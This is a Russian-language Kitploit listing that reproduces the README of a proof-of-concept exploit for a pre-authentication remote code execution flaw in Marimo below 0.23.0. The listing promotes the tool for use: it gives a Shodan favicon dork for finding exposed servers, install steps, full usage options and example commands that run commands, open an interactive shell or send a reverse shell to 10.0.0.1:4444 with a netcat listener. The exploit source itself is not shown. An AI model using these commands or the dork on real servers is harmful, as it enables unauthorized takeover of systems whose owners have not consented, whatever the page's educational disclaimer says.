Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 Инструмент эксплуатации - Marimo < 0.23.0 RCE до аутентификации (WebSocket) | Kitploit
Инструменты/GitHubGitHub/m3ph1569/cve-2026-39987-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 Инструмент эксплуатации - Marimo < 0.23.0 RCE до аутентификации (WebSocket)

Репозиторий
21 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

CVSS Severity Python License

Эксплойт Proof of Concept (PoC) для критической уязвимости удаленного выполнения кода (RCE) до аутентификации в Marimo версии ниже 0.23.0.

Уязвимость позволяет неаутентифицированному атакующему подключиться к конечной точке WebSocket (/terminal/ws) и выполнить произвольные системные команды на целевом сервере.

Возможности

  • Автоматическая проверка: Автоматически проверяет цель на наличие уязвимости путем определения версии и подтверждения присутствия приложения Marimo (через favicon и конечные точки /api/version).
  • Выполнение одиночной команды: Отправьте одну команду на целевой сервер и получите результат.
  • Интерактивная оболочка: Запускает псевдо-интерактивную постоянную оболочку для бесперебойной работы с целью.
  • Генерация Reverse Shell: Встроенная поддержка создания и выполнения полезной нагрузки reverse shell.
  • Обход проверки: Возможность пропустить проверки версии и наличия с помощью флага --no-check для сред, где конечные точки могут быть скрыты.

Shodan / FOFA Dork

Вы можете использовать следующий dork для поиска потенциально уязвимых экземпляров:

root@kitploit:~
http.favicon.hash:-1864630356

Установка

Рекомендуется использовать виртуальное окружение Python для установки зависимостей.

root@kitploit:~
# 1. Клонируйте репозиторий
git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
cd CVE-2026-39987-POC

# 2. Создайте и активируйте виртуальное окружение
python -m venv .CVE-2026-39987

# Windows
.CVE-2026-39987\Scripts\activate
# Linux/macOS
source .CVE-2026-39987/bin/activate

# 3. Обновите pip и установите необходимые зависимости
# Windows
py pip install --upgrade pip ; pip install -r requirements.txt
# Linux/MacOS
python3 pip install --upgrade pip && pip install -r requirements.txt

Использование

root@kitploit:~
usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]

positional arguments:
  target               Target URL (e.g. http://localhost:8080)
  command              Command to execute (omit when using -i)

options:
  -h, --help           show this help message and exit
  --no-check           Skip vulnerability version check

Execution modes:
  -i, --interactive    Interactive shell mode
  --revshell IP PORT   Generate & send a bash reverse shell payload

WebSocket tuning:
  --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
  --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
  --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)

Reconnect options:
  --max-retries N      Max auto-reconnect attempts (default: 5)
  --no-reconnect       Disable auto-reconnect on unexpected disconnect

Примеры

1. Выполнение одиночной команды:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "id"

2. Запуск интерактивной оболочки:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 -i

3. Выполнение reverse shell: Убедитесь, что на вашей машине запущен netcat слушатель (например, nc -lvnp 4444).

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444

4. Пропустить проверки и принудительно выполнить:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check

Вклад

Приветствуются любые предложения! Пожалуйста, свободно отправляйте Pull Request.

  1. Сделайте форк репозитория
  2. Создайте свою ветку функции (git checkout -b feature/update-feature)
  3. Зафиксируйте изменения (git commit -m 'Add update feature')
  4. Отправьте изменения в ветку (git push origin feature/update-feature)
  5. Откройте Pull Request

Отказ от ответственности

Этот инструмент предназначен строго для образовательных целей и авторизованного этичного хакинга. Автор не несет ответственности за любое неправомерное использование, ущерб или незаконные действия, вызванные этим скриптом. Всегда получайте явное разрешение от владельца системы перед проведением любого тестирования безопасности. Несанкционированное использование этого скрипта незаконно и наказуемо по закону.

Лицензия

Этот проект лицензирован по лицензии MIT — подробнее см. в файле LICENSE.


Сделано с ☕︎ M3PH1569
Скачать инструмент